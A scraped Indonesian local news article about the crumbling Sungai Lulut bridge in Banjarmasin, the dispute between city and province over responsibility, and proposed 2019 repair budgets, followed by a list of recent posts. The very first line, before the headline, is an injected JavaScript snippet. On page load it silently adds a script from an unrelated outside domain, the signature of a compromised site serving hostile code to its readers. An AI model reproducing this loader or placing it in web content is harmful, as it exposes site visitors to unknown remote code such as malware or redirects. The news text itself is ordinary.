(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Menunggu Realisasi Provinsi Benahi Jembatan Sungai Lulut, Kapan?


BANJARMASIN, Sejumlah infrastruktur, khususnya jembatan penghubung di Kota Banjarmasin kondisinya cukup memprihatinkan. Seperti Jembatan Sungai Lulut, Kecamatan Banjarmasin Timur yang menjadi penghubung jalan alternatif Kota Banjarmasin, Kota Banjarbaru dan Kabupaten Banjar ini sudah terbilang sangat renta hingga rawan terjadinya runtuhan pondasi. Tapi sayangnya, perbaikannya masih lepas dari prioritas. Siapa yang mesti bertanggungjawab?

Senin (24/1) malam sekitar pukul 21.00 Wita, Kapolsek Banjarmasin Timur Kompol H Uskiansyah sempat meninjau langsung kondisi jembatan tersebut. Terlihat bahwa jembatan ini tidak layak lagi untuk dilewati dari segi keamanan dan volume kekuatan dari jembatan itu sendiri. Dia mengatakan kondisi dari jembatan tersebut patah dan rusak. Hal ini akan memicu kecelakaan yang tidak dibisa ditebak.

“Rencananya setelah ini, akan dikoordinasikan ke pimpinan untuk diambil langkah selanjutnya. Untuk sementara warga sekitar tetap mengawasi jalan tersebut dan memberikan penghalang batas tepi jembatam dari kayu”katanya.

Sungai lulut tersebut merupakan kawasan padat penduduk diisi oleh banyak perumahan-perumahan yang dapat dilihat dari sisi pinggir jalan.

Samsi salah seorang warga yang melintasi jembatan tersebut mengungkapkan keperihatian akan jembatam tersebut. Sebelumnya banyak ajuan dari masyarakat sekitar kepada pemerintah untuk memperbaiki jembatan ini, agar bisa digunakan secara layak. “Khawatirnya adanya kecelakaan tak terduga dikarenakan jembatan yang tidak layak ini,” ungkapnya.

Mendangar hal tersebut, Walikota Ibnu Sina berpendapat, bahwa kewenangan jalan tersebut ialah dari pihak provinsi bukan dari pemerintah kota Banjarmasin.

“Terkait hal tersebut, ini sudah kami koordinasikan dengan pihak Provinsi untuk ditindaklanjuti, dan semoga 2019 Anggaran APBD bisi direalisasikan di sana,” katanya, Selasa (24/4).

Nantinya pihak Banjarmasin akan terus memantau perkembangan jembatan tersebut, saat ini pemko hanya meminta para dishub atau satlantas untuk memantau lalu lintas disana.

Dari Satuan Lalu lintas Polresta Kota Banjarmasin sudah mengecek jembatan tersebut, dinas PUPR pun juga ikut serta melihat kondisi hingga sampai ke pondasi jembatan tersebut. Sementara ini Satlantas Polresta akan menjaga jalan tersebut agar mengatur lalu lintas dilokasi tersebut.

Kasat Lantas Polresta Banjarmasin Kompol Wibowo SIK mengatakan Jembatan tersebut akan kami pantau terus terlebih pada pagi dan sore sering terjadi kemacetan pada jalan tersebut. Masalah kemacetan Sungai Lulut ini terjadi pada pukul 07.00- 08.00 Wita dan pukul 16.00-18.00 Wita. “Mudahan Pemerintah Provinsi dapat memperbaikinya agar kelancaran lalu lintas dan kecelakaan lalu lintas dapat di hindari,” katanya.

Terkait ucapan Walikota Banjarmasin Ibnu Sina yang mengatakan untuk pelebaran jalan Sungai Lulut merupakan tanggungjawab Pemprov Kalsel. “Itu adalah kewenangan provinsi. Kami berharap ruas jalan Sungai Lulut mendapatkan perhatian, baik jembatannya juga ruas jalannya agar warga yang bermukim di kawasan Sungai Lulut dan sekitarnya, mendapatkan kenyamanan, minimal tidak macet,” katanya.

Wacana pelebaran jalan yang berdampak pada pembebasan lahan, mantan anggota DPRD Kalsel ini mengatakan prosesnya bisa terealisasi asal ada kepastian dari Pemprov Kalsel terkait APBD 2019 nanti.

Sekretaris Bappeda Kalsel Ariadi Noor menegaskan Pemprov Kalsel berkomitmen untuk pelebaran jalan Sungai Lulut, apabila memang terkait dengan kewenangan pemerintah provinsi. “Terkait kewenangan provinsi, kami komitmen dengan kewenangan tersebut. Segera mungkin akan ditindaklanjuti SKPD terkait,” ujarnya.

Ditambahkannya pemprov juga akan berkoordinasi dengan Bebeberapa pimpinan daerah seperti Kota Banjarmasin, Kota Banjarmasin serta Kanupaten Banjar dan akan menginventarisasi apa saja yang menjadi kewenangan Pemprov Kalsel

Kepala Sub Bagian Perencanaan dan Pelaporan Kalsel Alain Filmore Harris menyatakan, Dinas PU Kalsel pada 2019 akan mengusulkan anggaran  sebesar Rp 30 miliar dengan membuat pondasi  jembatan baru untuk mengganti jembatan yang rusak tersebut. “Ini dapat dilaksanakan jika lahannya sudah dibebaskan Pemkot Banjarmasin. Jembatan Sungai Lulut yang sudah ada akan diduplikasi dengan jembatan baru, syaratnya lahan harus dikosongkan,” katanya.

Sedangkan untuk Jalan Veteran, lanjutnya, dianggarkan Rp 5 miliar dan untuk tahun kedepan dianggarkan Rp 10 miliar. “Tahun ini kita anggarkan Rp 5 miliar untuk perbaikan jalan veteran dan tahun depan kita usulkan untuk overlay Jalan Veteran,” bebernya.

Terkait pelebaran jalan ia menyatakan anggaran tersebut diperuntukan untuk perbaikan jalan, bukan untuk pelebaran jalan. “Untuk pelebaran jalan tahun ini belum ada, karena kita fokus kepada Jalan Veteran sekarang kondisinya tidak terlalu bagus aspalnya, jadi kita perlu perbaikan dengan cara overlay atau ditimpa sepanjang 1 kilometer,” singkatnya.  (Ammar)

Reporter: Ammar
Editor: Chell

Desy Arfianty

Recent Posts

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

2 menit ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

30 menit ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

2 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

2 jam ago

Ragam Kerajinan Rotan Merah Mejeng di Expo HUT ke-44 Dekranas

KANALKALIMANTAN.COM, SOLO - Kerajinan dari rotan merah menjadi salah satu primadona yang dihadirkan Dewan Kerajinan… Read More

2 jam ago

Pj Bupati Erlin Hardi Berdialog dengan Mahasiswa Kapuas di Yogya

KANALKALIMANTAN.COM, YOGYAKARTA - Penjabat (Pj) Bupati Kapuas Erlin Hardi berdialog dengan mahasiswa asal Kabupaten Kapuas… Read More

4 jam ago

This website uses cookies.